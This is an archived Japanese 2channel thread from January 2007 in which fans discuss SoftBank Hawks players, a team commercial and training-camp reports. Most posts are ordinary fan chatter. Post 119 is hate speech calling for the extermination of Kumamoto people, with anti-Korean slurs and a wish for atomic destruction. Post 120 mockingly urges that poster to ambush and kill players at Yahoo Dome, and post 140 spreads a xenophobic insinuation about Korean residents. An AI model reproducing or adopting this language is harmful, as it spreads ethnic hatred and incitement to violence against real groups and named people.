肥溜めですから。

115 :代打名無し@実況は実況板で:2007/01/20(土) 02:31:04 ID:Cb9rq9Tm0
>>105
あんたもよー絡んどるがな

116 :代打名無し@実況は実況板で:2007/01/20(土) 02:32:31 ID:TkEq9uAx0
>>101
川崎が好感もてるところは、勤勉で実直なのに
ユーモアセンスもあり、自分自身が馬鹿になれるところだろう
宗リンがいるかぎり、鷹は当分安泰だなあと思う
結婚しても、和田のように好感度を維持できれば
勘違い腐女子ヲタが消える以上に
親身に応援するファンが増えるだろう

117 :代打名無し@実況は実況板で:2007/01/20(土) 03:15:44 ID:741SWQpwO
川崎きゅんはセンス無いけど努力してるから偉いですねっ☆(*^-^)b

118 :代打名無し@実況は実況板で:2007/01/20(土) 03:28:08 ID:m9wf46S50
ソフトバンクのCMはみんなで一緒に台詞を言いすぎてて何て言ってるかわからないから微妙

119 :麻原彰晃マンセー田舎者熊本蛮族死ね:2007/01/20(土) 03:51:51 ID:ofrMOsIA0
野蛮熊本原人の下等猿は死滅しろ。
超絶田舎者熊本原人は日本からとっとと出て行け。

日本に寄生する下等な朝鮮クマンコ原人はコケにして踏みにじれ。
意味不明な野蛮な宇宙語熊本語は朝鮮語にそっくり
魅力など皆無熊本は原爆でなくなれ 熊本猿は一匹残らず駆除せよ

   \やーい 蛆虫 /
        ⊂ ≡ ⊃   \死ね田舎者熊本原人ー/
         _  ||
   ∧_∧ // || ∧_∧    ∧_∧      ⌒O     ∫∬∫  コギャン!
  ( ´∀`)// ∩( ´∀`)   ( ´∀`)                _, ,_     コギャン!
  (  つ ,つ   ヽ`    ,つ  (つ  つ ⌒ o       ゜〜ヽ<`ε´ >ノ 〜゜
  入  V_     ノ ノ> >   人  Y´           ゜ 〜  |豚│ 〜
  <_ノ\__)    \_)\)   し (_)             〜 | │ 〜

120 :代打名無し@実況は実況板で:2007/01/20(土) 05:33:00 ID:EzLwN59j0
>>199
難解な日本語だが、秋山や松中を殺したいという君の熱望だけは伝わる。
一言忠告させてもらうなら、「駆除せよ」とか人まかせにしないで、自分で殺れ。
ヤフードームあたりで待ち伏せとけば可能でしょ?


121 :代打名無し@実況は実況板で:2007/01/20(土) 05:44:43 ID:jTPzDOZL0
ロングパスきたー
>>199に期待

122 :代打名無し@実況は実況板で:2007/01/20(土) 07:46:40 ID:QpbNI5va0
べ?

123 :代打名無し@実況は実況板で:2007/01/20(土) 08:18:42 ID:T0ieYAb3O
>>199は童t(ry

124 :代打名無し@実況は実況板で:2007/01/20(土) 08:28:00 ID:Xo5wcJcs0
>>118
あれは聖徳太子でもないと聞き取れない
ホワイトでは無理

125 :代打名無し@実況は実況板で:2007/01/20(土) 09:39:34 ID:Ir45YtQ90
ハムオタですが、うちの陽のお兄ちゃんが、そちらでお世話になってます。ペコリ。
いまどんな案配なんでしょう。最近噂を聞かないモノで。

126 :代打名無し@実況は実況板で:2007/01/20(土) 10:30:20 ID:hwsXxwPO0
まず弟を返せ
話はそれからだ

まだまだ育成じゃないかな
今季1軍はないと思われ

127 :代打名無し@実況は実況板で:2007/01/20(土) 11:02:53 ID:WfOBWBubO
CM見たけど和田さん影薄すぎじゃん
和巳と松中と宗と・・・・誰だっけ?ワッチだ!

128 :代打名無し@実況は実況板で:2007/01/20(土) 11:19:45 ID:741SWQpwO
和田きゅん今年は15勝よろしくねっ☆(*^-^)b

129 :代打名無し@実況は実況板で:2007/01/20(土) 11:21:20 ID:KE2gt0jN0
ガス松ファイト

130 :代打名無し@実況は実況板で:2007/01/20(土) 11:24:25 ID:vbSnVYc40
CMに出てるホワイトって選手は
支配下に登録されてる?
選手リストに名前が見あたらないぞ。

131 :代打名無し@実況は実況板で:2007/01/20(土) 11:28:56 ID:KE2gt0jN0
ジャンクた村がんばれ

132 :代打名無し@実況は実況板で:2007/01/20(土) 12:29:51 ID:Cb9rq9Tm0
>>116
>結婚しても、和田のように好感度を維持できれば

つ、釣られないぞ

バカ野郎!
ポスティングポスティングと第二の井口よろしくぐんぐん好感度土砂崩れなのに何ぬかす!
釣られたあああああああああああああああああ

133 :代打名無し@実況は実況板で:2007/01/20(土) 12:37:01 ID:hkLnDyV/0
>>132
和田はポスティングで出て行けば全国区になって
また好感度があがるから心配なし

134 :代打名無し@実況は実況板で:2007/01/20(土) 12:39:34 ID:kBvB3R1m0
ムネリンの劣化が異常に激しい件


135 :代打名無し@実況は実況板で:2007/01/20(土) 12:42:46 ID:hkLnDyV/0
>>134
WBCで一生分の運と力を費やしたから
しょうがない====>鳥越2世として余生を過ごしてくれ

136 :代打名無し@実況は実況板で:2007/01/20(土) 12:42:50 ID:JdhbIjxP0
ホワイトは隠し登録してるよ
背番号980で突如出場する予定

137 :代打名無し@実況は実況板で:2007/01/20(土) 12:43:00 ID:TkEq9uAx0
顔やルックスは多少劣化してもいいよ
新人や若手にイケメンいるから
それよりも、HR二桁打てるようになってもらいたい

138 :代打名無し@実況は実況板で:2007/01/20(土) 12:48:44 ID:hkLnDyV/0
チャイチロー川崎ガンバレ

139 :代打名無し@実況は実況板で:2007/01/20(土) 12:53:01 ID:741SWQpwO
川崎きゅんはイチローきゅんを尊敬して影響受けるのはいいんですが
マネをするのは良くありませんっ☆(*^-^)b
イチローきゅんみたいな天才のマネしても仕方ないので
早く自分の出来ることや役割を考えて自分のスタイルを見つけましょうっ☆(*^-^)b

140 :アンチ野球には三国人の方も居るみたいですね:2007/01/20(土) 12:56:38 ID:YLZexWIw0
http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=FjUo9HpT0

【音楽】金正日総書記、小沢征爾氏に北朝鮮国立交響楽団の指揮者を要請、断られる[01/17][1件]

287 : 名前:名無しさん@恐縮です E-mail: 投稿日:2007/01/18(木) 05:23:34 ID:FjUo9HpT0
正日は日本国は嫌いかもしれんが
人は好きなはず、製品も

       
          ↓   そして、今日は・・・

http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=ZOcb6bmm0

          
          ↓    途中でID変えちゃうよ

http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=KwR31UrQ0

普段ならサッカー煽りに対して、野球プギャーレスの筈が何故か・・・
俺が後でIDを検索することを意識してか、やたら日本LOVEを強調するw
他のスレとの論調の違いに注目w

448 名前:名無しさん@恐縮です[] 投稿日:2007/01/20(土) 08:39:50 ID:KwR31UrQ0
>>444

現実生活では黙ってるけど
こういうところでは心の中で思ってること言えるからね
俺は韓国 北朝鮮に負けるのは絶対いやだ
ワールドカップとU17アジアカップで勝ったときはうれしかった


あ   や   し    い   ね   w

141 :代打名無し@実況は実況板で:2007/01/20(土) 13:53:50 ID:lVGGuFfM0
野原は息切れ最下位…自ら“罰走”
http://sportsnavi.yahoo.co.jp/baseball/npb/headlines/20070114-00000021-spnavi_ot-base.html
>計13周のインターバル走が長く険しかった。周囲のゲキが飛ぶ中、腰に手をあて肩で息をしながらゴール。
>最終周には小嶋と橋本に追い抜かれてのフィニッシュに、「俊足」を売りにする野原のプライドは切り裂かれた。

秋山コーチの福田秀平評
> 室内練習場でノックを見て「福田が目立っていた」と名前を挙げて評価。
> 「背が高くて(180センチ)あれだけ動けるのはいい。柔らかいしね」。
> その後、屋外でインターバル走を跳ねるようにこなす福田を見つけると
> 「おお、元気、元気。もともと持っているものがあるんだろうな」と目で追い続けた。
============================================================

142 :代打名無し@実況は実況板で:2007/01/20(土) 14:12:12 ID:bqTE/9OS0
>>141

合掌

143 :代打名無し@実況は実況板で:2007/01/20(土) 14:46:08 ID:XqB/5tN90
VIP並にレベルが低いな・・・

144 :代打名無し@実況は実況板で:2007/01/20(土) 15:39:09 ID:NAq9oASR0
age

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)